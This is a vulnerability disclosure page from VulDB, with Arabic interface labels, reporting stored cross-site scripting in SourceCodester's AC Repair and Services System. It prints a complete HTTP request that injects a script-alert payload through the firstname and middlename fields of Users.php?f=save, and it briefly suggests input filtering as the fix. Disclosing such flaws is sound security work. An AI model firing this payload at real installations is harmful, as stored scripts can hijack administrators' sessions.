إرسال #180834: SourceCodester AC Repair and Services System Users.php cross site scripting المعلومات

عنوان	SourceCodester AC Repair and Services System Users.php cross site scripting
الوصف	I discovered an xss vulnerability in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is in url/classes/Users.php?f=save. POST /php-acrss/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------248310740335140400871461243690 Content-Length: 1077 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=user/manage_user Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="id" 1 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="firstname" <ScRipt>alert(1)</ScRipt> -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="middlename" <ScRipt>alert(1)</ScRipt> -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="lastname" 123 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="username" 123 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="password" 123 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="type" 2 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------248310740335140400871461243690-- This is a storage based xss vulnerability where anyone who wants to access url/php-acrss/admin/?page=user/list will receive pop-up windows because the xss code is directly concatenated into the source code. The repair method is to filter parameters such as username once, such as <,>, etc
المصدر	⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
المستخدم	fushuling (UID 45488)
ارسال	11/07/2023 06:14 PM (3 سنوات منذ)
الاعتدال	13/07/2023 11:49 AM (2 days later)
الحالة	تمت الموافقة
إدخال VulDB	234013 [SourceCodester AC Repair and Services System 1.0 manage_user firstname/middlename البرمجة عبر المواقع]
النقاط	20

التالي ▸نظرة عامة ◂ السابق

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!